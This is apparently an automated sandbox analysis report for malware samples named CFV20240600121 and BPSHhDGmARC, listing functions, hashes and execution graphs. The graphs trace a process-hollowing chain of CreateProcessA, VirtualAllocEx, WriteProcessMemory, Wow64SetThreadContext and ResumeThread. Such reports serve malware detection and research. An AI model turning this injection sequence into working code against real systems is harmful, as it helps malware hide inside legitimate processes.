                                        • RTL: Re-Waiting, xrefs: 014472C1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-605551621
                                        • Opcode ID: 12f6acb1e37e2302bb38b559452dc92bdd9850f6241f59b072544734311cb75d
                                        • Instruction ID: a8c4cfabe4b980d3123230703b8fdbb2c96d342b24a66cc8be0d5a6c4558e4f8
                                        • Opcode Fuzzy Hash: 12f6acb1e37e2302bb38b559452dc92bdd9850f6241f59b072544734311cb75d
                                        • Instruction Fuzzy Hash: 3441F235700206ABE721CF2ACC41B6AB7A5FB64715F10062EF955AB3A0DB31F84687D5
                                        Function 01482300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$]:%u
                                        • API String ID: 48624451-3050659472
                                        • Opcode ID: 15f5f9f1c3691ca09e9a69e9495f6f1adb06e7a8ed135c4ba9c1aea08deb7fb4
                                        • Instruction ID: fcb299f810f87bdf84d0b17a1e58b3a90344a0af2407989997526400793cb955
                                        • Opcode Fuzzy Hash: 15f5f9f1c3691ca09e9a69e9495f6f1adb06e7a8ed135c4ba9c1aea08deb7fb4
                                        • Instruction Fuzzy Hash: DD317376A002299EDB60DE39CC50FAFB7F8EF54610F84455AE949E3210EB709A44CBA0
                                        Function 01417D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-
                                        • API String ID: 1302938615-2137968064
                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                        • Instruction ID: 6e391b464fa4c89cc5f52d2e3c7093b9e312592fd446622bf6acee3ea0bb7341
                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                        • Instruction Fuzzy Hash: 5B91C071E4020A9BEF24CF6DC890ABFBBE1AF44322F64451BE955E73E8D73099418B51
                                        Function 013D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$@
                                        • API String ID: 0-1194432280
                                        • Opcode ID: e1aed9049e6ac69d6f305c14b9fbe5fa25c2fd8b7c6ce6cf939147179abf1810
                                        • Instruction ID: e105518b1c83e12ce428097e8f95bc7b1b2c4f0fbefa72988960533761190b32
                                        • Opcode Fuzzy Hash: e1aed9049e6ac69d6f305c14b9fbe5fa25c2fd8b7c6ce6cf939147179abf1810
                                        • Instruction Fuzzy Hash: 07810B72D002699BDB35CB54CC45BEEB7B8AF58714F0041DAEA19B7290D7705E85CFA0

                                        Execution Graph

                                        Execution Coverage:11.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:230
                                        Total number of Limit Nodes:14
                                        execution_graph 32047 723ef20 32048 723ef26 32047->32048 32049 723ed9a 32047->32049 32049->32047 32049->32048 32051 723d194 32049->32051 32052 723efc0 PostMessageW 32051->32052 32053 723f02c 32052->32053 32053->32049 32217 287d320 32218 287d366 32217->32218 32222 287d4f2 32218->32222 32226 287d500 32218->32226 32219 287d453 32223 287d500 32222->32223 32229 287af74 32223->32229 32227 287af74 DuplicateHandle 32226->32227 32228 287d52e 32227->32228 32228->32219 32230 287d568 DuplicateHandle 32229->32230 32231 287d52e 32230->32231 32231->32219 32054 723bee8 32055 723beee 32054->32055 32060 723da80 32055->32060 32075 723dad9 32055->32075 32091 723da90 32055->32091 32056 723bef9 32061 723da90 32060->32061 32062 723dace 32061->32062 32106 723e047 32061->32106 32111 723e543 32061->32111 32116 723e27f 32061->32116 32120 723df5f 32061->32120 32126 723e110 32061->32126 32130 723e012 32061->32130 32136 723e22d 32061->32136 32140 723e3ae 32061->32140 32146 723df09 32061->32146 32150 723e1ab 32061->32150 32154 723e304 32061->32154 32158 723e0a5 32061->32158 32062->32056 32076 723da9e 32075->32076 32077 723dae2 32075->32077 32078 723dace 32076->32078 32079 723e543 2 API calls 32076->32079 32080 723e047 2 API calls 32076->32080 32081 723e0a5 2 API calls 32076->32081 32082 723e304 2 API calls 32076->32082 32083 723e1ab 2 API calls 32076->32083 32084 723df09 2 API calls 32076->32084 32085 723e3ae 4 API calls 32076->32085 32086 723e22d 3 API calls 32076->32086 32087 723e012 4 API calls 32076->32087 32088 723e110 2 API calls 32076->32088 32089 723df5f 4 API calls 32076->32089 32090 723e27f 3 API calls 32076->32090 32077->32056 32078->32056 32079->32078 32080->32078 32081->32078 32082->32078 32083->32078 32084->32078 32085->32078 32086->32078 32087->32078 32088->32078 32089->32078 32090->32078 32092 723da9e 32091->32092 32093 723e543 2 API calls 32092->32093 32094 723e047 2 API calls 32092->32094 32095 723e0a5 2 API calls 32092->32095 32096 723e304 2 API calls 32092->32096 32097 723e1ab 2 API calls 32092->32097 32098 723df09 2 API calls 32092->32098 32099 723dace 32092->32099 32100 723e3ae 4 API calls 32092->32100 32101 723e22d 3 API calls 32092->32101 32102 723e012 4 API calls 32092->32102 32103 723e110 2 API calls 32092->32103 32104 723df5f 4 API calls 32092->32104 32105 723e27f 3 API calls 32092->32105 32093->32099 32094->32099 32095->32099 32096->32099 32097->32099 32098->32099 32099->32056 32100->32099 32101->32099 32102->32099 32103->32099 32104->32099 32105->32099 32107 723e04d 32106->32107 32163 723b613 32107->32163 32167 723b618 32107->32167 32108 723e086 32108->32062 32112 723e086 32111->32112 32113 723e065 32111->32113 32112->32062 32114 723b613 WriteProcessMemory 32113->32114 32115 723b618 WriteProcessMemory 32113->32115 32114->32112 32115->32112 32171 723b480 32116->32171 32175 723b478 32116->32175 32117 723e299 32117->32062 32121 723df68 32120->32121 32124 723b478 2 API calls 32121->32124 32184 723b3d0 32121->32184 32188 723b3c8 32121->32188 32122 723e8a6 32124->32122 32128 723b613 WriteProcessMemory 32126->32128 32129 723b618 WriteProcessMemory 32126->32129 32127 723e00b 32127->32062 32128->32127 32129->32127 32131 723e023 32130->32131 32133 723b3d0 ResumeThread 32131->32133 32134 723b478 2 API calls 32131->32134 32135 723b3c8 ResumeThread 32131->32135 32132 723e8a6 32133->32132 32134->32132 32135->32132 32138 723b480 Wow64SetThreadContext 32136->32138 32139 723b478 2 API calls 32136->32139 32137 723e24c 32138->32137 32139->32137 32141 723df68 32140->32141 32143 723b3d0 ResumeThread 32141->32143 32144 723b478 2 API calls 32141->32144 32145 723b3c8 ResumeThread 32141->32145 32142 723e8a6 32143->32142 32144->32142 32145->32142 32193 723b8a0 32146->32193 32197 723b894 32146->32197 32201 723b703 32150->32201 32205 723b708 32150->32205 32151 723e1cd 32151->32062 32209 723b550 32154->32209 32213 723b558 32154->32213 32155 723e325 32159 723e0ae 32158->32159 32161 723b613 WriteProcessMemory 32159->32161 32162 723b618 WriteProcessMemory 32159->32162 32160 723e384 32160->32062 32161->32160 32162->32160 32164 723b618 WriteProcessMemory 32163->32164 32166 723b6b7 32164->32166 32166->32108 32168 723b660 WriteProcessMemory 32167->32168 32170 723b6b7 32168->32170 32170->32108 32172 723b4c5 Wow64SetThreadContext 32171->32172 32174 723b50d 32172->32174 32174->32117 32176 723b47c 32175->32176 32178 723b47e Wow64SetThreadContext 32175->32178 32177 723b40e 32176->32177 32176->32178 32179 723b3b3 32177->32179 32180 723b419 ResumeThread 32177->32180 32183 723b50d 32178->32183 32179->32117 32181 723b441 32180->32181 32181->32117 32183->32117 32185 723b410 ResumeThread 32184->32185 32187 723b441 32185->32187 32187->32122 32189 723b3cc 32188->32189 32190 723b35d 32189->32190 32191 723b41a ResumeThread 32189->32191 32190->32122 32192 723b441 32191->32192 32192->32122 32194 723b929 32193->32194 32194->32194 32195 723ba8e CreateProcessA 32194->32195 32196 723baeb 32195->32196 32198 723b898 CreateProcessA 32197->32198 32200 723baeb 32198->32200 32202 723b753 ReadProcessMemory 32201->32202 32204 723b797 32202->32204 32204->32151 32206 723b753 ReadProcessMemory 32205->32206 32208 723b797 32206->32208 32208->32151 32210 723b558 VirtualAllocEx 32209->32210 32212 723b5d5 32210->32212 32212->32155 32214 723b598 VirtualAllocEx 32213->32214 32216 723b5d5 32214->32216 32216->32155 32232 2874668 32233 287467f 32232->32233 32234 287468b 32233->32234 32238 2874798 32233->32238 32243 2873e28 32234->32243 32236 28746aa 32239 28747bd 32238->32239 32247 2874898 32239->32247 32252 28748a8 32239->32252 32244 2873e33 32243->32244 32260 2875b98 32244->32260 32246 2877078 32246->32236 32248 28747c7 32247->32248 32250 28748a7 32247->32250 32248->32234 32249 28749ac 32249->32249 32250->32249 32256 2874528 32250->32256 32254 28748cf 32252->32254 32253 28749ac 32253->32253 32254->32253 32255 2874528 CreateActCtxA 32254->32255 32255->32253 32257 2875d38 CreateActCtxA 32256->32257 32259 2875dfb 32257->32259 32261 2875ba3 32260->32261 32264 2875bb8 32261->32264 32263 2877175 32263->32246 32265 2875bc3 32264->32265 32268 2875be8 32265->32268 32267 287725a 32267->32263 32269 2875bf3 32268->32269 32272 2875c18 32269->32272 32271 287734d 32271->32267 32273 2875c23 32272->32273 32275 28788ab 32273->32275 32279 287ab50 32273->32279 32274 28788e9 32274->32271 32275->32274 32283 287cc50 32275->32283 32288 287cc41 32275->32288 32282 287ab66 32279->32282 32293 287af80 32279->32293 32298 287af90 32279->32298 32282->32275 32284 287cc71 32283->32284 32285 287cc95 32284->32285 32330 287d208 32284->32330 32334 287d1f8 32284->32334 32285->32274 32289 287cc71 32288->32289 32290 287cc95 32289->32290 32291 287d208 3 API calls 32289->32291 32292 287d1f8 3 API calls 32289->32292 32290->32274 32291->32290 32292->32290 32294 287af90 32293->32294 32302 287b077 32294->32302 32310 287b088 32294->32310 32295 287af9f 32295->32282 32300 287b077 2 API calls 32298->32300 32301 287b088 2 API calls 32298->32301 32299 287af9f 32299->32282 32300->32299 32301->32299 32303 287b099 32302->32303 32304 287b0bc 32302->32304 32303->32304 32318 287b312 32303->32318 32322 287b320 32303->32322 32304->32295 32305 287b0b4 32305->32304 32306 287b2c0 GetModuleHandleW 32305->32306 32307 287b2ed 32306->32307 32307->32295 32311 287b099 32310->32311 32312 287b0bc 32310->32312 32311->32312 32316 287b312 LoadLibraryExW 32311->32316 32317 287b320 LoadLibraryExW 32311->32317 32312->32295 32313 287b0b4 32313->32312 32314 287b2c0 GetModuleHandleW 32313->32314 32315 287b2ed 32314->32315 32315->32295 32316->32313 32317->32313 32319 287b334 32318->32319 32321 287b359 32319->32321 32326 287ad98 32319->32326 32321->32305 32324 287b334 32322->32324 32323 287b359 32323->32305 32324->32323 32325 287ad98 LoadLibraryExW 32324->32325 32325->32323 32327 287b500 LoadLibraryExW 32326->32327 32329 287b579 32327->32329 32329->32321 32332 287d215 32330->32332 32331 287d24f 32331->32285 32332->32331 32338 287d030 32332->32338 32335 287d208 32334->32335 32336 287d24f 32335->32336 32337 287d030 3 API calls 32335->32337 32336->32285 32337->32336 32339 287d03b 32338->32339 32341 287db60 32339->32341 32342 287d14c 32339->32342 32341->32341 32343 287d157 32342->32343 32344 2875c18 3 API calls 32343->32344 32345 287dbcf 32344->32345 32345->32341

                                        Executed Functions

                                        Function 07294B48 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 614 7294b48-7294b84 615 7294bcd-7294bcf 614->615 616 7294b86-7294b8c 614->616 618 7294bd4-7294bd9 615->618 617 7294b8e-7294b98 616->617 616->618 619 7294bdb-7294bfb 617->619 618->619 621 7294bfd 619->621 622 7294c02-7294c5c 619->622 621->622 625 7294c5f 622->625 626 7294c66-7294c82 625->626 627 7294c8b-7294c8c 626->627 628 7294c84 626->628 630 7294ddf-7294e4f 627->630 634 7294c91-7294cca 627->634 628->625 629 7294ccc-7294cfa 628->629 628->630 631 7294cff-7294d3f 628->631 632 7294d8e-7294d92 628->632 633 7294dbe-7294dda 628->633 628->634 635 7294d44-7294d51 628->635 636 7294d77-7294d89 628->636 629->626 652 7294e51 call 7296100 630->652 653 7294e51 call 7296762 630->653 654 7294e51 call 7296ca7 630->654 631->626 637 7294da5-7294dac 632->637 638 7294d94-7294da3 632->638 633->626 634->626 646 7294d5a-7294d72 635->646 636->626 639 7294db3-7294db9 637->639 638->639 639->626 646->626 651 7294e57-7294e61 652->651 653->651 654->651
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 61b444ca0940d90a3aa6fda1dacf1ba16ebeedf9d9e6bb4bc7c04aba6594fdcc
                                        • Instruction ID: 6b3d741b3097746bbd86480fb458757f7c2ea1eef4ac8afacc370fa6e4dab350
                                        • Opcode Fuzzy Hash: 61b444ca0940d90a3aa6fda1dacf1ba16ebeedf9d9e6bb4bc7c04aba6594fdcc
                                        • Instruction Fuzzy Hash: 6EA116B4E2024A8FDB08DFA9C8846DEFBF2FF89310F14802AD455AB254D7749942CF55
                                        Function 07294B9B Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 655 7294b9b-7294bfb 660 7294bfd 655->660 661 7294c02-7294c5c 655->661 660->661 664 7294c5f 661->664 665 7294c66-7294c82 664->665 666 7294c8b-7294c8c 665->666 667 7294c84 665->667 669 7294ddf-7294e4f 666->669 673 7294c91-7294cca 666->673 667->664 668 7294ccc-7294cfa 667->668 667->669 670 7294cff-7294d3f 667->670 671 7294d8e-7294d92 667->671 672 7294dbe-7294dda 667->672 667->673 674 7294d44-7294d51 667->674 675 7294d77-7294d89 667->675 668->665 691 7294e51 call 7296100 669->691 692 7294e51 call 7296762 669->692 693 7294e51 call 7296ca7 669->693 670->665 676 7294da5-7294dac 671->676 677 7294d94-7294da3 671->677 672->665 673->665 685 7294d5a-7294d72 674->685 675->665 678 7294db3-7294db9 676->678 677->678 678->665 685->665 690 7294e57-7294e61 691->690 692->690 693->690
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 5f9977e4bb5e9496b73f932bfd3d5f694ed1e40fc78235bf401b7b5ad31b07d2
                                        • Instruction ID: de86a5b0f239e25e2bf69a26cda1c1f935cc5101bf87be069f2b7a04e17e352b
                                        • Opcode Fuzzy Hash: 5f9977e4bb5e9496b73f932bfd3d5f694ed1e40fc78235bf401b7b5ad31b07d2
                                        • Instruction Fuzzy Hash: 02A123B4E142498FCB08DFA9C9846DEFBF2FF89300F24806AD415AB265D734A946CF54
                                        Function 07294BD8 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 915 7294bd8-7294bfb 917 7294bfd 915->917 918 7294c02-7294c5c 915->918 917->918 921 7294c5f 918->921 922 7294c66-7294c82 921->922 923 7294c8b-7294c8c 922->923 924 7294c84 922->924 926 7294ddf-7294e4f 923->926 930 7294c91-7294cca 923->930 924->921 925 7294ccc-7294cfa 924->925 924->926 927 7294cff-7294d3f 924->927 928 7294d8e-7294d92 924->928 929 7294dbe-7294dda 924->929 924->930 931 7294d44-7294d51 924->931 932 7294d77-7294d89 924->932 925->922 948 7294e51 call 7296100 926->948 949 7294e51 call 7296762 926->949 950 7294e51 call 7296ca7 926->950 927->922 933 7294da5-7294dac 928->933 934 7294d94-7294da3 928->934 929->922 930->922 942 7294d5a-7294d72 931->942 932->922 935 7294db3-7294db9 933->935 934->935 935->922 942->922 947 7294e57-7294e61 948->947 949->947 950->947
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: e7786cb4cc6f19bfee03f9863dfb57c18725fdd2857748dae428147ac43f1718
                                        • Instruction ID: 36c64fc05d93f0f5017a3ff09c4813a50c79934117bee2c70a007b87ac617e82
                                        • Opcode Fuzzy Hash: e7786cb4cc6f19bfee03f9863dfb57c18725fdd2857748dae428147ac43f1718
                                        • Instruction Fuzzy Hash: EC81C1B4E112198FDB08DFA9C984A9EFBF2FF89300F14802AD415AB354D775A946CF54
                                        Function 07299D3F Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 951 7299d3f-7299d54 953 7299d57 951->953 954 7299d5e-7299d7a 953->954 955 7299d8c-7299d8d 954->955 956 7299d7c 954->956 957 729a099 955->957 958 7299d92-7299d9a 955->958 956->953 956->957 956->958 959 7299ebf-7299f30 956->959 960 7299e9e 956->960 961 7299f93-7299f96 956->961 962 7299fc5-7299fd3 956->962 998 729a09b call 723ed00 957->998 999 729a09b call 723ecef 957->999 1000 7299d9f call 7230da0 958->1000 1001 7299d9f call 7230db0 958->1001 1009 7299f36 call 729e049 959->1009 1010 7299f36 call 729e058 959->1010 1011 7299f36 call 729e0d1 959->1011 1002 7299ea1 call 72325c8 960->1002 1003 7299ea1 call 72325d8 960->1003 1012 7299f99 call 729f5d8 961->1012 1013 7299f99 call 729f5a7 961->1013 967 7299fde-729a04f 962->967 963 7299ea7-7299eba 963->954 964 7299f9f-7299fc0 964->954 966 729a0a1-729a0a9 983 729a079 967->983 984 729a051-729a05d 967->984 968 7299da5-7299e4a 1004 7299e50 call 729e049 968->1004 1005 7299e50 call 729e058 968->1005 1006 7299e50 call 729e0d1 968->1006 979 7299f3c-7299f49 981 7299f4b-7299f57 979->981 982 7299f73 979->982 987 7299f59-7299f5f 981->987 988 7299f61-7299f67 981->988 986 7299f79-7299f8e 982->986 989 729a07f-729a094 983->989 990 729a05f-729a065 984->990 991 729a067-729a06d 984->991 993 7299f71 987->993 988->993 992 729a077 990->992 991->992 992->989 993->986 995 7299e56-7299e6f 1007 7299e72 call 729ae00 995->1007 1008 7299e72 call 729adf0 995->1008 997 7299e78-7299e99 997->954 998->966 999->966 1000->968 1001->968 1002->963 1003->963 1004->995 1005->995 1006->995 1007->997 1008->997 1009->979 1010->979 1011->979 1012->964 1013->964
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 62e00e72d0de3273058f4a89d0e2f2c5d91bf49ad7f56f865f02ba740c4e45be
                                        • Instruction ID: df30b4ee4bfae7c9f7e611721d5b984c2fb5099388e788b09a8ceb119a259a4d
                                        • Opcode Fuzzy Hash: 62e00e72d0de3273058f4a89d0e2f2c5d91bf49ad7f56f865f02ba740c4e45be
                                        • Instruction Fuzzy Hash: 3291C378E10229CFDB64DFA5D949B9DBBB2BB88300F1085AAD40EA7354DB745E81CF10
                                        Function 07290818 Relevance: .5, Instructions: 495COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00f36115d493da11c1f7fe2d4e735de9bacebc7845b87b5e21df3aa4e378b08d
                                        • Instruction ID: ef9971f1302cdec9be141c20ca907e3dcad84545447c04adcee9fee973148d2a
                                        • Opcode Fuzzy Hash: 00f36115d493da11c1f7fe2d4e735de9bacebc7845b87b5e21df3aa4e378b08d
                                        • Instruction Fuzzy Hash: FA225C74A1021ACFCB24DF68D884A9DBBF6FF85310F1581A5D449AB225DB30EE85CF50
                                        Function 0729702D Relevance: .3, Instructions: 319COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1079cb462593ba1a5bad4707293d2899257e608ea16a2ac86d2ca9b14957e13b
                                        • Instruction ID: 0500ffb2f17b49899eb071be5eeb3d383884d40679adab8004c8a3a4600cfaa8
                                        • Opcode Fuzzy Hash: 1079cb462593ba1a5bad4707293d2899257e608ea16a2ac86d2ca9b14957e13b
                                        • Instruction Fuzzy Hash: BDD109B493520ADFCB44CFA9D8858AEBBB2FF89300F18D165D415A7315D734AA82CF94
                                        Function 07297078 Relevance: .3, Instructions: 290COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f6476fa9883c635e6cf59c7521ff872875870152f0d7319c0696b101b22a754
                                        • Instruction ID: 91ad0ad4405d299845f1221b04a2cf17902f018624df93dffc6a90c7cba21a61
                                        • Opcode Fuzzy Hash: 1f6476fa9883c635e6cf59c7521ff872875870152f0d7319c0696b101b22a754
                                        • Instruction Fuzzy Hash: 24D104B4E2120ADBCB44CF99D8858AEFBB6FF89300F14D165D415AB315D734AA82CF94
                                        Function 0729AEB3 Relevance: .2, Instructions: 231COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 900fdd6726b2c9a31408db314632862e2df61ab02aff661f8a3a863ff87b6e88
                                        • Instruction ID: 9743b3046288b468c89a2b903e07b2c6f1883ff2f976c39d10b9879790a75ee7
                                        • Opcode Fuzzy Hash: 900fdd6726b2c9a31408db314632862e2df61ab02aff661f8a3a863ff87b6e88
                                        • Instruction Fuzzy Hash: 62A13EB4E15259CFCB14DFA8D5809ADFBB6BF89300F2491AAD408A7356D730AE41CF61
                                        Function 0729A2A3 Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55b9504a6d908d8d929d4538fc2fd9be19b38cf54fbcf41d28997d7942980942
                                        • Instruction ID: 29e31f3312fe84d8f745ac2c97b618554219ed1b87a3eddab84805430f867050
                                        • Opcode Fuzzy Hash: 55b9504a6d908d8d929d4538fc2fd9be19b38cf54fbcf41d28997d7942980942
                                        • Instruction Fuzzy Hash: 574125B4D2520A9FCF05CFA5D5405EEBBB2EF8A300F24D56AD015B7214E7794A01CF65
                                        Function 07296100 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a923d7bd7801493c4f7c81110d8396025d40bde74e022e1ea88a77bf95fb934
                                        • Instruction ID: 117c2c0e81b9ff164f02c0729200c786c73475c79547b379288211697cc1d139
                                        • Opcode Fuzzy Hash: 9a923d7bd7801493c4f7c81110d8396025d40bde74e022e1ea88a77bf95fb934
                                        • Instruction Fuzzy Hash: 8F2115B1E006188BEB18CFABD8443DEFBF6AFC9310F18C06AD809A6254DB3419558F90
                                        Function 0723B478 Relevance: 3.1, APIs: 2, Instructions: 104threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 593 723b478-723b47a 594 723b47e-723b4cb 593->594 595 723b47c 593->595 603 723b4db-723b50b Wow64SetThreadContext 594->603 604 723b4cd-723b4d9 594->604 595->594 596 723b40e-723b417 595->596 598 723b3b3-723b3ba 596->598 599 723b419-723b43f ResumeThread 596->599 601 723b441-723b447 599->601 602 723b448-723b46d 599->602 601->602 608 723b514-723b544 603->608 609 723b50d-723b513 603->609 604->603 609->608
                                        APIs
                                        • ResumeThread.KERNELBASE ref: 0723B432
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723B4FE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: Thread$ContextResumeWow64
                                        • String ID:
                                        • API String ID: 1826235168-0
                                        • Opcode ID: 86ec13fb5dfe2382dd586e384ecb4d400d2a212956cade772adad3adf69c2d5f
                                        • Instruction ID: c0ee9f932f23a32dd122f8a095f3b3d88d3a282b41ca64a4fd939b9f2dd7c163
                                        • Opcode Fuzzy Hash: 86ec13fb5dfe2382dd586e384ecb4d400d2a212956cade772adad3adf69c2d5f
                                        • Instruction Fuzzy Hash: 9B4187F1D1020A8FDB10DFAAC4857EEFBF4EF48314F24846AD519A7241D7789A85CBA1
                                        Function 0723B894 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1014 723b894-723b896 1015 723b89a 1014->1015 1016 723b898-723b899 1014->1016 1017 723b89b-723b89d 1015->1017 1018 723b89e-723b935 1015->1018 1016->1015 1017->1018 1021 723b937-723b941 1018->1021 1022 723b96e-723b98e 1018->1022 1021->1022 1023 723b943-723b945 1021->1023 1027 723b990-723b99a 1022->1027 1028 723b9c7-723b9f6 1022->1028 1025 723b947-723b951 1023->1025 1026 723b968-723b96b 1023->1026 1029 723b953 1025->1029 1030 723b955-723b964 1025->1030 1026->1022 1027->1028 1032 723b99c-723b99e 1027->1032 1036 723b9f8-723ba02 1028->1036 1037 723ba2f-723bae9 CreateProcessA 1028->1037 1029->1030 1030->1030 1031 723b966 1030->1031 1031->1026 1033 723b9c1-723b9c4 1032->1033 1034 723b9a0-723b9aa 1032->1034 1033->1028 1038 723b9ae-723b9bd 1034->1038 1039 723b9ac 1034->1039 1036->1037 1040 723ba04-723ba06 1036->1040 1050 723baf2-723bb78 1037->1050 1051 723baeb-723baf1 1037->1051 1038->1038 1041 723b9bf 1038->1041 1039->1038 1042 723ba29-723ba2c 1040->1042 1043 723ba08-723ba12 1040->1043 1041->1033 1042->1037 1045 723ba16-723ba25 1043->1045 1046 723ba14 1043->1046 1045->1045 1047 723ba27 1045->1047 1046->1045 